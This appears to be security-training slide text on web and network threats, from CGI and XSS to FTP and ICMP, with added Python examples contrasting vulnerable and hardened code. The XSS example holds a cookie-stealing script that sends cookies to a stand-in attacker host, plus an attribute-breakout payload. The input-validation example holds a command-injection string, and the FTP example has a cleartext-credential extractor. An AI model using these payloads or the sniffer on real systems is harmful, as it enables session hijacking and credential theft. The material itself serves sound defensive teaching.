  30. Working with the Web Common Gateway Interface Common Gateway Interface (CGI) is an older form of scripting that was used extensively in early web systems. CGI scripts could be used to capture data from a user using simple forms. CGI scripts are not widely used in new systems and are being replaced by Java, ActiveX, and other technologies. The CGI script ran on the web server, and it interacted with the client browser. Vulnerabilities in CGI are the result of its inherent ability to do what it is told. If a CGI script is written to wreak havoc (or carries extra code added to it by a miscreant) and it is executed, your systems will suffer. The best protection against any weaknesses is to not run applications written in CGI.

  31. Working with the Web Cookies Cookies are text files that a browser maintains on the user's hard disk. They store information on a Web client for future sessions with a Web server. A cookie will typically contain information about the user. It is used to provide a persistent, customized Web experience for each visit and to track a user’s browsing habits. A cookie can contain the history of a client to improve customer service. A tracking cookie is a particular type of permanent cookie that stays around, whereas a session cookie stays around only for the particular visit to a website. The danger in maintaining session information is that sites may access cookies stored in the browser’s cache that may contain sensitive information identifying the user or allowing access to secured sites. The information stored in a cookie is not typically encrypted and might be vulnerable to hacker attacks. The best protection is to not allow cookies to be accepted. Almost every browser offers the option to enable or disable cookies. If you enable them, you can usually choose whether to accept/reject all or only those from an originating server.

32. Working with the Web Cross-site Scripting (XSS) Cross-site scripting (XSS) is a security vulnerability, typically found in web applications, in which untrusted input is written into a web page without being properly encoded, so that an attacker can inject script into the pages viewed by other users. The attacker tricks a user into visiting the vulnerable site (or a link to it), and the injected code executes locally in the user's browser with the vulnerable site's identity. XSS poses the most danger when a user is logged in to a financial organization's site with his or her credentials. The problem is not that the attacker takes over the server; it is more likely that the attacker takes over the client's session, for example by stealing the session cookie, and thereby gains information about the legitimate user that is not publicly available. The best protection on the server side is to validate input and HTML-encode all untrusted data before placing it in a page; on the client side, disabling the running of scripts prevents the injected code from executing.
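The vulnerable and hardened rendering paths side by side, as an added example that is not from the slides: a search page reflects the user's query both as element content and inside an input attribute. The template, the payloads and the attacker.example host are constructed for illustration; html.escape from the standard library does the encoding.

```python
import html

# Constructed page template: the query is reflected in two contexts,
# element content and a quoted attribute value.
TEMPLATE = ('<p>Search results for: {query}</p>\n'
            '<input name="q" value="{attr}">')

# Constructed attack inputs.
SCRIPT_PAYLOAD = ('<script>document.location='
                  '"https://attacker.example/?c="+document.cookie</script>')
ATTR_PAYLOAD = '" onfocus="alert(1)" autofocus="'   # closes the attribute


def render_unsafe(query: str) -> str:
    """Vulnerable: untrusted input is interpolated into the HTML as-is,
    so a <script> tag or a quote that breaks out of the attribute is live."""
    return TEMPLATE.format(query=query, attr=query)


def render_safe(query: str) -> str:
    """Hardened: HTML-encode the input for both contexts. quote=True also
    encodes double and single quotes, so the value cannot close the
    surrounding attribute and start a new one."""
    encoded = html.escape(query, quote=True)
    return TEMPLATE.format(query=encoded, attr=encoded)


def has_live_script(page: str) -> bool:
    """Crude marker: does the rendered HTML still contain a <script tag?"""
    return "<script" in page.lower()


def breaks_attribute(page: str) -> bool:
    """Crude marker: did a raw quote followed by an event handler survive?"""
    return '" onfocus=' in page


if __name__ == "__main__":
    print(has_live_script(render_unsafe(SCRIPT_PAYLOAD)))   # True
    print(has_live_script(render_safe(SCRIPT_PAYLOAD)))     # False
    print(breaks_attribute(render_unsafe(ATTR_PAYLOAD)))    # True
    print(breaks_attribute(render_safe(ATTR_PAYLOAD)))      # False
    print(render_safe(SCRIPT_PAYLOAD))
```

The first payload is the cookie theft the slide describes: in the unsafe page the browser runs it and sends document.cookie to the attacker's host. The second shows why encoding quotes matters as well as angle brackets: without quote=True the attribute context is still exploitable even though no tag is injected.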

33. Working with the Web Input Validation Any time a user must supply values in a session, the data entered should be validated before it is used. Many vendors, however, have fallen prey to input validation vulnerabilities in their code: in some instances empty values were accepted, while in others a particular value acted as a backdoor password and allowed privilege escalation. The best protection against input validation vulnerabilities is for developers to follow best practices and validate every value entered, preferably against an allowlist of what is acceptable rather than a blocklist of what is known to be bad. As an administrator, when you learn of an input validation vulnerability in any application on your system, you should stop using it, or isolate it, until a patch has been released and installed.
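One example serving both the CGI slide and this one, added here and not taken from the slides: a CGI-style handler reads the user parameter from a query string, and the two functions show the difference between concatenating it into a shell command line and validating it against an allowlist before placing it in an argv list. The finger command, the username rule and the query strings are constructed for illustration; nothing is actually executed.

```python
import re
from urllib.parse import parse_qs

# Constructed allowlist for a login name: 1-32 letters, digits, . _ or -.
# The lower bound of 1 rejects the empty value the slide warns about.
USERNAME_RE = re.compile(r"^[A-Za-z0-9._-]{1,32}$")


def validate_username(value: str) -> str:
    """Allowlist check; returns the value unchanged or raises ValueError."""
    if not USERNAME_RE.fullmatch(value):
        raise ValueError(f"invalid username: {value!r}")
    return value


def build_cmd_unsafe(query_string: str) -> str:
    """Vulnerable CGI pattern: the parameter is concatenated straight into a
    command line destined for the shell (os.system / popen). A ';' or '|'
    in the input becomes a second command run with the web server's rights."""
    params = parse_qs(query_string, keep_blank_values=True)
    user = params.get("user", [""])[0]
    return "finger " + user


def build_cmd_safe(query_string: str) -> list:
    """Hardened: exactly one parameter, validated against the allowlist, and
    passed as an argv list (subprocess.run(argv), shell=False) so the value
    can only ever be a single argument, never a second command."""
    params = parse_qs(query_string, keep_blank_values=True)
    values = params.get("user", [])
    if len(values) != 1:          # missing or duplicated parameter
        raise ValueError("exactly one 'user' parameter is required")
    return ["finger", validate_username(values[0])]


def accepts(query_string: str) -> bool:
    """True if the hardened path would run the command for this request."""
    try:
        build_cmd_safe(query_string)
    except ValueError:
        return False
    return True


if __name__ == "__main__":
    attack = "user=alice%3B+id"       # decodes to "alice; id"
    print(build_cmd_unsafe(attack))    # finger alice; id   <- shell runs 'id'
    print(accepts(attack))             # False
    print(build_cmd_safe("user=alice"))  # ['finger', 'alice']
    print(accepts("user="))            # False: empty value rejected
```

keep_blank_values=True matters: without it parse_qs silently drops user= and the handler might fall back to a default instead of rejecting the request. The argv list is the second layer; even if the allowlist were loosened, the shell never sees the value.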

34. Working with the Web Java Applets A Java applet is a small, self-contained Java program (not to be confused with JavaScript) that is downloaded from a server to a client and run from the browser. The client browser must be able to run Java applets in a Java virtual machine on the client. Applets were once used extensively in website development. Unsigned Java applets rely on a sandbox for security: the virtual machine confines the applet to its own environment and denies it access to system resources outside that environment, so a web program that runs in its own environment and cannot interfere with any other process is said to run in a sandbox. Signed applets differ in one key respect: a signed applet carries a digital signature that lets the client verify its publisher, and once verified it runs outside the sandbox with much higher system access, which is why signed applets are usually produced in-house or by custom programming rather than downloaded from the Internet, and why users should never accept one unless they are sure the provider is trusted. Errors in the Java virtual machine may allow an applet to escape the sandbox; such an applet is unsafe and may perform malicious operations, so the client runtime must be kept patched. From a user's standpoint, the best defense is to run only applets from reputable sites you are familiar with. From an administrator's standpoint, make certain programmers adhere to secure programming guidelines when creating applets.

35. Working with the Web JavaScript JavaScript is a scripting language that is downloaded from a website as part of a web page and executed by the client's browser. Despite the name, it is unrelated to Java and needs no Java virtual machine. Inside a browser, JavaScript runs in the browser's own sandbox rather than with the full operating system access that a language such as C has; even so, it can read and modify the page, access the site's cookies, and make requests on the user's behalf, and bugs in browser script engines have let scripts break out of that sandbox. A malicious or injected script can therefore hijack a session, damage data, or send information to unauthorized persons. JavaScript run outside a browser, in a server-side or scripting-host runtime, does have access to system resources like any other program. Browser settings and content filtering control which sites are allowed to run scripts.

36. Working with the Web Popups A popup is a new browser window that a website opens in the foreground. Popups are an annoyance, and some contain inappropriate content or entice the user to download malware. Popup blockers can have side effects: some delete information the user has already entered by reloading the page, causing unnecessary grief, and field help for fill-in forms is often delivered as a popup. Many popup blockers are integrated into vendor toolbars or into the browser itself. A popunder is a window that a website opens in the background; popunders are in the same family as popups and should be prevented by enabling a popup blocker on the user's computer. You can adjust the blocker's settings to meet organizational policy or to best protect the user environment: a high setting may prevent legitimate application or program installation, while a medium setting blocks most automatic popups but still allows normal functionality. Popup blockers can be circumvented in various ways: most block only JavaScript-initiated windows, so technologies such as Flash bypass them, and in many browsers holding down the Ctrl key while clicking a link lets the link bypass the popup filter.

37. Working with the Web Signed Applets Signed applets are similar to unsigned Java applets, with two key differences: a signed applet does not run in the Java sandbox, and it has higher system access capabilities. Signed applets are typically provided by in-house or custom-programming efforts rather than downloaded from the Internet. The digital signature identifies the publisher and lets the client verify that the applet has not been altered; if the signature is verified as authentic, the applet is installed. A valid signature proves only who published the code, not that the code is safe, so users should never accept a signed applet unless they are sure the provider is trusted. Most web browsers have settings that control Java access, allowing clients to restrict the resources available to Java applets or scripts.

38. Working with the Web SMTP Relay SMTP relay is a feature built into many e-mail servers that lets them accept mail and forward it on to other e-mail servers. A dedicated relay (gateway) server placed in front of the primary e-mail server also protects it by filtering viruses and absorbing port scan attacks. Relaying was originally intended to bridge between systems, and it is what allows e-mail connections between systems across the Internet to be made easily. Unfortunately, a server that relays for anyone, an open relay, is exploited to generate a great deal of spam: a stranger can send unwanted, unsolicited mail that appears to originate from your server and is difficult to trace back to its real source. Configure your e-mail server to relay only for its own domains and for clients that are authenticated (or on its own network), and to reject every other relay attempt; the server's response to such an attempt is conventionally "relay access denied".
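The relay policy described above as a decision function, added here and not taken from the slides: for each RCPT TO, accept if the recipient's domain is local, or if the client is authenticated or on the server's own network; reject everything else with a 554 relay-denied response. The local domains, the trusted network and the client addresses are constructed for this example (RFC 5737 documentation ranges).

```python
import ipaddress

# Constructed deployment: the domains this server delivers for, and the LAN
# whose clients are allowed to relay outbound without authenticating.
LOCAL_DOMAINS = {"example.com", "mail.example.com"}
TRUSTED_NETS = [ipaddress.ip_network("192.0.2.0/24")]


def recipient_domain(addr: str) -> str:
    """Domain part of an address, lower-cased (no address validation here)."""
    return addr.rpartition("@")[2].lower()


def relay_decision(client_ip: str, authenticated: bool, rcpt_to: str) -> tuple:
    """Policy for one RCPT TO. Returns (smtp_code, reason): 250 accepts the
    recipient, 554 refuses to relay for it."""
    if recipient_domain(rcpt_to) in LOCAL_DOMAINS:
        return 250, "local delivery"            # inbound mail for us: always ok
    ip = ipaddress.ip_address(client_ip)
    if authenticated:
        return 250, "relay for authenticated client"
    if any(ip in net for net in TRUSTED_NETS):
        return 250, "relay for client on our network"
    return 554, "relay access denied"


def open_relay_decision(client_ip: str, authenticated: bool, rcpt_to: str) -> tuple:
    """What an open relay does, shown only for contrast: accept anything,
    which is exactly the behaviour spammers look for."""
    return 250, "accepted (open relay)"


def count_refusals(attempts: list) -> int:
    """How many of (client_ip, authenticated, rcpt_to) attempts get refused."""
    return sum(1 for a in attempts if relay_decision(*a)[0] == 554)


if __name__ == "__main__":
    # Constructed session fragments: an Internet host tries to use us to reach
    # a third party, a LAN client sends outbound mail, inbound mail arrives.
    attempts = [
        ("203.0.113.9", False, "victim@elsewhere.test"),   # spammer: refused
        ("192.0.2.10", False, "partner@elsewhere.test"),   # our LAN: relayed
        ("203.0.113.9", True, "partner@elsewhere.test"),   # authenticated: relayed
        ("203.0.113.9", False, "bob@example.com"),          # inbound: delivered
    ]
    for a in attempts:
        print(a[2], relay_decision(*a))
    print("refused:", count_refusals(attempts))   # 1
```

The IP-based exception is the weak part of the policy: an attacker who reaches the LAN, or a compromised workstation on it, can relay freely, which is why modern deployments prefer SMTP authentication over network trust for outbound mail.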

39. Working with File Transfer Protocol FTP servers let users upload and download files between client systems and a networked FTP server. FTP has many potential security issues, including anonymous file access and unencrypted authentication. FTP is three things: a protocol, a client, and a server. The client system runs a program called FTP, the server runs an FTP server service, and the two communicate using the FTP protocol, which defines the command structure and the interactions between them. Early FTP servers based security on the honor system: most logons to an FTP site used the anonymous logon, with the user name anonymous and, by convention, the user's e-mail address as the password. In that situation the only security is whatever the operating system's file permissions provide. The major security vulnerability of FTP is that the user ID and password are not encrypted; they are sent in clear text, so they can be recovered by anyone capturing the packets, a major breach, especially when you connect to an FTP server across the Internet. The protection is to replace plain FTP with an encrypted alternative: SFTP (the SSH File Transfer Protocol), which is a different protocol carried inside a Secure Shell (SSH) session, or FTPS, which is FTP protected with Transport Layer Security (TLS) or its predecessor Secure Sockets Layer (SSL).
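The exposure described above, as an added detection example that is not part of the slides: given a reassembled FTP control-channel stream such as a protocol analyser shows, pull out every USER/PASS pair sent in the clear, and recognise a session that negotiated TLS before authenticating. The two streams below are constructed for this example, including the anonymous logon with an e-mail address as the password.

```python
import re

# Constructed reassembled control stream of a plain FTP session (port 21):
# server replies begin with a 3-digit code, client commands are bare words.
SAMPLE_STREAM = """\
220 ftp.example.net FTP server ready
USER anonymous
331 Guest login ok, send your e-mail address as password
PASS jdoe@example.net
230 Guest login ok
USER alice
331 Password required for alice
PASS Sup3rSecret!
230 User alice logged in
"""

# Constructed FTPS session: after AUTH TLS the control channel is encrypted,
# so the USER and PASS that follow are not visible to a sniffer.
FTPS_STREAM = """\
220 ftp.example.net FTP server ready
AUTH TLS
234 Proceed with negotiation
"""

CMD_RE = re.compile(r"^(USER|PASS|AUTH)\s+(\S+)", re.IGNORECASE)


def commands(stream: str):
    """Yield (COMMAND, argument) for each client command line of interest."""
    for line in stream.splitlines():
        m = CMD_RE.match(line)
        if m:
            yield m.group(1).upper(), m.group(2)


def extract_credentials(stream: str) -> list:
    """Pair each USER with the PASS that follows it. Returns
    [(user, password), ...] for every logon visible in clear text."""
    found, pending_user = [], None
    for cmd, arg in commands(stream):
        if cmd == "USER":
            pending_user = arg
        elif cmd == "PASS" and pending_user is not None:
            found.append((pending_user, arg))
            pending_user = None
    return found


def tls_negotiated(stream: str) -> bool:
    """True if the client issued AUTH TLS/SSL before any USER command, i.e.
    credentials travelled inside a TLS session (FTPS) rather than in clear."""
    for cmd, arg in commands(stream):
        if cmd == "AUTH" and arg.upper() in ("TLS", "SSL"):
            return True
        if cmd == "USER":
            return False
    return False


if __name__ == "__main__":
    for user, password in extract_credentials(SAMPLE_STREAM):
        print(f"cleartext logon: {user} / {password}")
    print("FTPS stream protected:", tls_negotiated(FTPS_STREAM))   # True
```

Running this over captured traffic is the quickest way to show management why plain FTP across the Internet is unacceptable; the same logic, applied to live traffic on port 21, doubles as a detection for policy violations once FTPS or SFTP is mandated.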

40. Understanding Network Protocols ICMP and SNMP Simple Network Management Protocol (SNMP) is used to monitor and manage network devices: the health of network equipment, computer equipment, and devices such as a UPS. SNMP agents listen on UDP port 161; the traps that agents send to the management station use UDP port 162. Internet Control Message Protocol (ICMP) carries error, control, and informational messages between hosts in TCP/IP, including destination-unreachable and other error reports; it is routable and is used by programs such as Ping and Traceroute. ICMP is one of the favorite protocols for DoS attacks (floods of echo requests, for example), so administrators often filter it at the border router to prevent these situations. Blocking ICMP entirely also breaks Ping, Traceroute, and path MTU discovery, so rate-limiting it or blocking only selected message types is usually preferable. Internet Group Management Protocol (IGMP) is used for group messaging and multicasting: it maintains the list of systems that belong to a multicast group, and a message sent to the group is delivered by the network to every member. Multicasting can consume huge amounts of bandwidth and possibly create a DoS situation, so most network administrators block broadcast and multicast traffic arriving from outside their local network.
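The ICMP flood case above, as an added detection example that is not part of the slides: parse firewall log lines for ICMP echo requests, count them per source per one-second window, and report sources that exceed a threshold. The log format, the addresses and the traffic volumes are constructed for this example; a real deployment would adapt the regular expression to its own device's format.

```python
import re
from collections import Counter

# Constructed log format: epoch timestamp, protocol, ICMP type, addresses.
LINE_RE = re.compile(
    r"ts=(?P<ts>\d+(?:\.\d+)?) proto=ICMP type=(?P<type>\d+) "
    r"src=(?P<src>\S+) dst=(?P<dst>\S+)"
)
ECHO_REQUEST = "8"   # ICMP type 8 = echo request (what Ping sends)


def make_sample_log() -> list:
    """Constructed firewall log: three ordinary pings from 198.51.100.4 one
    second apart, then 250 echo requests from 203.0.113.7 within one second,
    plus one echo reply that must not be counted."""
    base = 1714557600
    lines = [f"ts={base + i} proto=ICMP type=8 src=198.51.100.4 dst=192.0.2.10"
             for i in range(3)]
    lines += [f"ts={base + 1 + i / 1000:.3f} proto=ICMP type=8 "
              f"src=203.0.113.7 dst=192.0.2.10" for i in range(250)]
    lines.append(f"ts={base + 1} proto=ICMP type=0 src=192.0.2.10 dst=198.51.100.4")
    return lines


def count_echo_requests(lines: list, window_s: int = 1) -> Counter:
    """Count echo requests per (source, window) bucket; other lines and
    other ICMP types are ignored."""
    counts = Counter()
    for line in lines:
        m = LINE_RE.search(line)
        if not m or m.group("type") != ECHO_REQUEST:
            continue
        bucket = int(float(m.group("ts")) // window_s) * window_s
        counts[(m.group("src"), bucket)] += 1
    return counts


def detect_icmp_flood(lines: list, threshold: int = 100, window_s: int = 1) -> list:
    """Sources sending at least `threshold` echo requests in one window.
    Returns sorted (src, window_start, count) tuples."""
    counts = count_echo_requests(lines, window_s)
    return sorted((src, bucket, n) for (src, bucket), n in counts.items()
                  if n >= threshold)


if __name__ == "__main__":
    log = make_sample_log()
    for src, start, n in detect_icmp_flood(log):
        print(f"possible ICMP flood: {src} sent {n} echo requests at ts={start}")
```

The threshold is the tuning knob: one host pinging at the default one-per-second rate never trips it, while a flood does within the first window. Rate-limiting echo requests at the border, rather than dropping all ICMP, addresses the same traffic without breaking path MTU discovery.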

  41. The End
